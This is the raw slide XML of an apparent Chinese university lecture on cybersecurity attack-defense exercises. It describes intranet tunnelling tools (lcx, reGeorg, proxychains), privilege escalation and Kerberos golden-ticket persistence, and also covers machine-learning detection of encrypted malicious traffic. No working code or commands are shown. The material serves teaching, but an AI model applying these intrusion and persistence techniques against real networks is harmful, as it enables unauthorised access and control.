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9" r:id="rId2"/>
    <p:sldId id="385" r:id="rId3"/>
    <p:sldId id="407" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="498" r:id="rId6"/>
    <p:sldId id="374" r:id="rId7"/>
    <p:sldId id="373" r:id="rId8"/>
    <p:sldId id="375" r:id="rId9"/>
    <p:sldId id="378" r:id="rId10"/>
    <p:sldId id="376" r:id="rId11"/>
    <p:sldId id="384" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="417" r:id="rId14"/>
    <p:sldId id="397" r:id="rId15"/>
    <p:sldId id="398" r:id="rId16"/>
    <p:sldId id="396" r:id="rId17"/>
    <p:sldId id="413" r:id="rId18"/>
    <p:sldId id="392" r:id="rId19"/>
    <p:sldId id="402" r:id="rId20"/>
    <p:sldId id="403" r:id="rId21"/>
    <p:sldId id="395" r:id="rId22"/>
    <p:sldId id="388" r:id="rId23"/>
    <p:sldId id="389" r:id="rId24"/>
    <p:sldId id="399" r:id="rId25"/>
    <p:sldId id="390" r:id="rId26"/>
    <p:sldId id="394" r:id="rId27"/>
    <p:sldId id="400" r:id="rId28"/>
    <p:sldId id="406" r:id="rId29"/>
    <p:sldId id="405" r:id="rId30"/>
    <p:sldId id="409" r:id="rId31"/>
    <p:sldId id="410" r:id="rId32"/>
    <p:sldId id="411" r:id="rId33"/>
    <p:sldId id="412" r:id="rId34"/>
    <p:sldId id="420" r:id="rId35"/>
    <p:sldId id="462" r:id="rId36"/>
    <p:sldId id="428" r:id="rId37"/>
    <p:sldId id="433" r:id="rId38"/>
    <p:sldId id="435" r:id="rId39"/>
    <p:sldId id="436" r:id="rId40"/>
    <p:sldId id="437" r:id="rId41"/>
    <p:sldId id="438" r:id="rId42"/>
    <p:sldId id="422" r:id="rId43"/>
    <p:sldId id="424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96" r:id="rId62"/>
    <p:sldId id="497" r:id="rId63"/>
    <p:sldId id="500" r:id="rId64"/>
    <p:sldId id="481" r:id="rId65"/>
    <p:sldId id="387" r:id="rId66"/>
    <p:sldId id="382" r:id="rId67"/>
    <p:sldId id="482" r:id="rId68"/>
    <p:sldId id="483" r:id="rId69"/>
    <p:sldId id="501" r:id="rId70"/>
    <p:sldId id="386" r:id="rId71"/>
    <p:sldId id="463" r:id="rId72"/>
    <p:sldId id="502" r:id="rId73"/>
    <p:sldId id="282" r:id="rId7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8"/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8" autoAdjust="0"/>
    <p:restoredTop sz="81905" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="237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buf.com/articles/system/93484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qniu.com/tools-tech/45207.html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如图 所示，这些域和其中的网元被信任边界分隔开来（这是因为这些设备遭受实际攻击的风险程度是不同的）。将设备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部署在不同位置和地理区域给物联网端到端安全带来挑战。因为这不仅使连接变得不可靠，还使跨信任边界的管理流程（例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如密钥撤销等）变得更为复杂。同时，云、管、端又同时面临不同的安全威胁，如下所示：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LCX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>lcx.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是一个基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>套接字实现的端口转发工具，它是从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>linux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下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>htran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工具移植到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>平台的。</a:t>
            </a:r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err="1" smtClean="0"/>
              <a:t>Regeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>reGeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>reDuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>的升级版，主要是把内网服务器的端口通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>http/https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>隧道转发到本机，形成一个回路。它利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>建立一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>socks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>代理进行内网穿透，服务器必须支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>程序中的一种。</a:t>
            </a:r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dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是一款在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>下可以实现全局代理的软件，性能相当稳定可靠。允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>TCP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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>通过代理隧道，支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>HTTP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SOCKS4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SOCKS5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>类型的代理服务器，支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>proxy chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>，即可配置多个代理，同一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>proxy chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>可使用不同类型的代理服务器。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LCX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>lcx.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是一个基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>套接字实现的端口转发工具，它是从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>linux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下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>htran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工具移植到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>平台的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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err="1" smtClean="0"/>
              <a:t>Regeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>reGeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>reDuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>的升级版，主要是把内网服务器的端口通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>http/https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>隧道转发到本机，形成一个回路。它利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>建立一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>socks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>代理进行内网穿透，服务器必须支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>程序中的一种。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>是一款在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>下可以实现全局代理的软件，性能相当稳定可靠。允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>TCP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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>通过代理隧道，支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>HTTP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SOCKS4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SOCKS5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>类型的代理服务器，支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>proxy chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>，即可配置多个代理，同一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>proxy chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>可使用不同类型的代理服务器。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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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其他技术提权</a:t>
            </a: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(Hot-potato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/articles/system/93484.html</a:t>
            </a:r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https://paper.seebug.org/620/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean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/>
              <a:t>当域渗透成功后，域控制器已被攻陷，这时通常需要维持域中权限，持久控制域控制器。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>golden ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>（黄金票据）主要是利用微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>协议缺陷和域中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>账号的信息，可生成任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>，该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>可用于当前域中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>认证的任何服务。攻击者只需要保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>账号中的信息生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>golden ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>注入内存当中，即可拥有权限，且该票据的有效期是十年。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71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https://www.aqniu.com/tools-tech/45207.html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对大量使用加密通信的恶意样本、各类加密通道的攻击行为、多种恶意或非法应用进行深度分析、数据观测，对多种检测手段进行探索、测试和验证，总结出了一套针对加密流量行之有效的安全检测方法，技术流程图如下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构建特征工程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特征工程在机器学习中占有非常重要的作用，一般认为包括特征构建、特征提取、特征选择三个部分。为保证后期检测引擎准确率足够高，特征工程是关键，所以需要在特征工程上花费大量精力。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构建、提取、选择特征工程的方法包括四步：先验知识验证、启发式搜索分析、降维可视化分析、综合工程测试。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观成科技把加密流量的特征共分为四大类：时空特征、握手特征、背景特征、证书特征；在这四大类的基础上，又分为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个子类、超过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种特征。这些特征足够细粒度地描述每一次加密会话，体现不同类加密流量中最细微的差别。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构建特征工程阶段，同时进行深度特征抽取，通过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算法对部分特征进行训练，如下图为通过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训练得出的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证书信息正常度量化结果，从训练结果可看出特征区分非常明显。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检测模型训练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模型训练使用的算法包括线性回归（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LinReg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）、随机森林（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RandomForest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）、决策树（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DecTree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）、神经网络（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）、支持向量机（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）、逻辑回归（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LogReg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）、卷积神经网络（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）。考虑到工程化的稳定性和成熟度，根据训练和测试结果，在不同的应用场景分别采用了不同的机器学习算法，横向比较中，随机森林的综合效果相对较好。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模型迭代与优化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初步训练完成之后，接下来就是对模型进行不断优化，优化的方法包括对选定的模型进一步参数调优、验证和测试，实际网络流量数据测试与迭代训练。最终针对各类型的加密流量，根据实际测试结果，选用效果最佳的算法及参数，保证准确率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43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077686"/>
            <a:ext cx="8372163" cy="55294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670"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2800" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2400"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr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306128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41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Page.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" spc="-60" baseline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44" y="6092607"/>
            <a:ext cx="1958547" cy="518469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44" y="6092607"/>
            <a:ext cx="1958547" cy="518469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045779"/>
            <a:ext cx="8340421" cy="5627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94864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226202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594864"/>
            <a:ext cx="9144000" cy="332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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="SimHei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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="华文中宋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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="华文中宋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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="华文中宋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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="华文中宋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 baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          <a:ea typeface="华文中宋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qianxin.com/wp-content/uploads/2019/06/dns_rebind.mp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gkk.com/2018/09/weblogic%E6%BC%8F%E6%B4%9E%E7%BB%83%E4%B9%A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buf.com/vuls/206374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security-advisory/alert-cve-2019-2729-5570780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onis.com/blog/kerberos-how-to-stop-golden-ticket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dutchcoders/transfer.sh.gi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hyperlink" Target="https://www.aqniu.com/tools-tech/45207.html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cdcoe.org/exercises/locked-shields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reat9/routersploit" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-frame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ok.douban.com/subject/25723796/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.or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2029" y="4047638"/>
            <a:ext cx="8707830" cy="1114192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>网络安全攻防演习漫谈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimHei" panose="02010609060101010101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69123" y="5311833"/>
            <a:ext cx="5820358" cy="1402676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>陈力波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>上海交通大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>网络空间安全学院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b="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>”行动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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现状：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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真实环境中攻击方法、范围的限制，导致攻击路径比较单一；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攻防的平衡性差，一般都是未公开漏洞打掉仅有的几个服务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400" dirty="0" smtClean="0"/>
              <a:t>   （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Coremail</a:t>
            </a:r>
            <a:r>
